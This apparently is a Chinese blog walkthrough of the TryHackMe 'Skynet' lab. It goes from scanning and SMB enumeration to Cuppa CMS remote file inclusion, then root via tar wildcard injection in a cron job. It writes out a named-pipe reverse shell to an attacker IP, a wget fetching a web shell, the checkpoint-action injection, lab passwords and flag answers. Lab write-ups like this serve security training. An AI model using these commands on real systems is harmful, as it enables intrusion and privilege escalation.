关于安全:tryhackmeSkynet远程文件包含漏洞cron任务通配符提权

48次阅读

共计 10224 个字符,预计需要花费 26 分钟才能阅读完成。

服务扫描

┌──(root💀kali)-[~]
└─# nmap -sV 10.10.166.193                                                                                                                                                                                   255 ⨯
Starting Nmap 7.91 (https://nmap.org) at 2021-08-31 05:18 EDT
Nmap scan report for 10.10.111.23
Host is up (0.32s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.67 seconds

目录爆破

└─# python3 dirsearch.py -u http://10.10.166.193 -e * -t 50 -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_|)

Extensions: CHANGELOG.md | HTTP method: get | Threads: 50 | Wordlist size: 220521

Error Log: /root/dirsearch/logs/errors-21-08-31_05-34-51.log

Target: http://10.10.166.193

[05:34:52] Starting: 
[05:34:58] 301 -  312B  - /admin  ->  http://10.10.111.23/admin/
[05:34:59] 200 -  523B  - /                 
[05:35:00] 301 -  310B  - /css  ->  http://10.10.111.23/css/
[05:35:03] 301 -  309B  - /js  ->  http://10.10.111.23/js/
[05:35:06] 301 -  313B  - /config  ->  http://10.10.111.23/config/
[05:35:19] 301 -  309B  - /ai  ->  http://10.10.111.23/ai/
[05:37:06] 301 -  319B  - /squirrelmail  ->  http://10.10.111.23/squirrelmail/

枚举 samba 服务

枚举用户,能够用空会话登录

┌──(root💀kali)-[~]
└─# enum4linux -U 10.10.166.193                                                                                                                                                                                                        255 ⨯
Starting enum4linux v0.8.9 (http://labs.portcullis.co.uk/application/enum4linux/) on Wed Sep  1 02:38:03 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.166.193
RID Range ........ 500-550,1000-1050
Username ......... ''Password .........''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.166.193    |
 ==================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ===================================== 
|    Session Check on 10.10.166.193    |
 ===================================== 
[+] Server 10.10.166.193 allows sessions using username '', password''

 =========================================== 
|    Getting domain SID for 10.10.166.193    |
 =========================================== 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ============================= 
|    Users on 10.10.166.193    |
 ============================= 
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: milesdyson       Name:   Desc: 

user:[milesdyson] rid:[0x3e8]
enum4linux complete on Wed Sep  1 02:38:20 2021

枚举分享目录

┌──(root💀kali)-[~]
└─# enum4linux -S 10.10.166.193
Starting enum4linux v0.8.9 (http://labs.portcullis.co.uk/application/enum4linux/) on Wed Sep  1 02:41:21 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.166.193
RID Range ........ 500-550,1000-1050
Username ......... ''Password .........''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.166.193    |
 ==================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ===================================== 
|    Session Check on 10.10.166.193    |
 ===================================== 
[+] Server 10.10.166.193 allows sessions using username '', password''

 =========================================== 
|    Getting domain SID for 10.10.166.193    |
 =========================================== 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ========================================= 
|    Share Enumeration on 10.10.166.193    |
 ========================================= 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        anonymous       Disk      Skynet Anonymous Share
        milesdyson      Disk      Miles Dyson Personal Share
        IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.166.193
//10.10.166.193/print$   Mapping: DENIED, Listing: N/A
//10.10.166.193/anonymous        Mapping: OK, Listing: OK
//10.10.166.193/milesdyson       Mapping: DENIED, Listing: N/A
//10.10.166.193/IPC$     [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
enum4linux complete on Wed Sep  1 02:41:44 2021

连贯 smb

smbclient //10.10.166.193/anonymous

在 logs/log1.txt 里找到明码:cyborg007haloterminator

question:What is Miles password for his emails?

answer:cyborg007haloterminator

登录 http://10.10.166.193/squirrel…

账号密码:milesdyson:cyborg007haloterminator

邮件信息 1,泄露 samba 明码

We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`

邮件信息 2,是一个奇怪的二进制,转成文本

01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111

转成文本:

balls hav zero tome to meto me tome to meto me tome to meto

邮件信息 3,一段奇怪的文字, 放到谷歌里搜寻了一下,如同是前些年那个出 bug 的 facebook 的 AI 说的一段话

i can i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i i can i i i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i . . . . . . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i i i i i everything else . . . . . . . . . . . . . .
balls have 0 to me to me to me to me to me to me to me to me to
you i i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to

登录 mailesdyson 的 samba

smbclient //10.10.166.193/milesdyson -U milesdyson
明码:)s{A&2Z=F^n_E.B`

在 notes/important.txt 里失去信息

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

暗藏目录名

/45kra24zxs28v3yd

question:What is the hidden directory?
answer:/45kra24zxs28v3yd
question:What is the vulnerability called when you can include a remote file for malicious purposes?
answer:/remote file inclusion 

爆破暗藏目录

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -u "http://10.10.166.193/45kra24zxs28v3yd/" -e* -t 50   

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_|)

Extensions: * | HTTP method: get | Threads: 50 | Wordlist size: 6100

Error Log: /root/dirsearch/logs/errors-21-09-01_04-50-59.log

Target: http://10.10.166.193/45kra24zxs28v3yd/

[04:50:59] Starting: 
[04:51:14] 301 -  337B  - /45kra24zxs28v3yd/administrator  ->  http://10.10.166.193/45kra24zxs28v3yd/administrator/
[04:51:14] 403 -  277B  - /45kra24zxs28v3yd/administrator/.htaccess
[04:51:15] 200 -    5KB - /45kra24zxs28v3yd/administrator/
[04:51:15] 200 -    5KB - /45kra24zxs28v3yd/administrator/index.php
[04:51:26] 200 -  418B  - /45kra24zxs28v3yd/index.html                                                            
                                                                                                                  
Task Completed

失去登录页面:http://10.10.166.193/45kra24z…

cms 名称

Cuppa CMS

cms exp

存在 Local/Remote File Inclusion
https://www.exploit-db.com/ex…

验证 LFI:
http://10.10.166.193/45kra24z…

能够读取本机信息:

Field configuration:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false lxd:x:106:65534::/var/lib/lxd/:/bin/false messagebus:x:107:111::/var/run/dbus:/bin/false uuidd:x:108:112::/run/uuidd:/bin/false dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin milesdyson:x:1001:1001:,,,:/home/milesdyson:/bin/bash dovecot:x:111:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false dovenull:x:112:120:Dovecot login user,,,:/nonexistent:/bin/false postfix:x:113:121::/var/spool/postfix:/bin/false mysql:x:114:123:MySQL Server,,,:/nonexistent:/bin/false 

近程读取 php 文件

筹备好反弹 shell 文件,本地开启一个 http 服务
python3 -m http.server

http://10.10.166.193/45kra24z…

拿到初始 shell

在 /home/milesdyson 找到 user.txt

question:What is the user flag?
answer:7ce5c2109a40f958099283600a9ae807

转成稳固 shell,用命令行下载一句话木马

wget http://10.13.21.169:8000/shel…

一句话木马拜访地址,用菜刀连贯

http://10.10.166.193/45kra24z…

能够 su milesdyson(须要先转成 tty), 明码是:cyborg007haloterminator,然而不能够用 ssh 直连

查看定时工作

$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/1 *   * * *   root    /home/milesdyson/backups/backup.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || (cd / && run-parts --report /etc/cron.daily)
47 6    * * 7   root    test -x /usr/sbin/anacron || (cd / && run-parts --report /etc/cron.weekly)
52 6    1 * *   root    test -x /usr/sbin/anacron || (cd / && run-parts --report /etc/cron.monthly)

查看定时工作脚本

$ cat /home/milesdyson/backups/backup.sh
cat /home/milesdyson/backups/backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

通配符提权,在 /var/www/html/ 别离写入三个文件

因为靶机的 nc 不能应用 -e,咱们用另外一种办法做反弹 shell,别离执行以下命令

mknod /tmp/backpipe p

echo '/bin/sh 0</tmp/backpipe | nc 10.13.21.169 4455 1>/tmp/backpipe' > shell.sh

echo "">"--checkpoint-action=exec=sh shell.sh"echo"" > --checkpoint=1

通配符提权解释

最初 tar cf /home/milesdyson/backups/backup.tgz * 这条命令的执行会变成:tar cf /home/milesdyson/backups/backup.tgz –checkpoint=1 –checkpoint-action=exec=sh shell.sh shell.sh

另外开启一个监听端口,等一分钟 cron 执行反弹 root shell

nc -lnvp 4455

在 /root/ 找到 root.txt

question:What is the root flag?
answer:3f0372db24753accc7179a282cd6a949

正文完
 0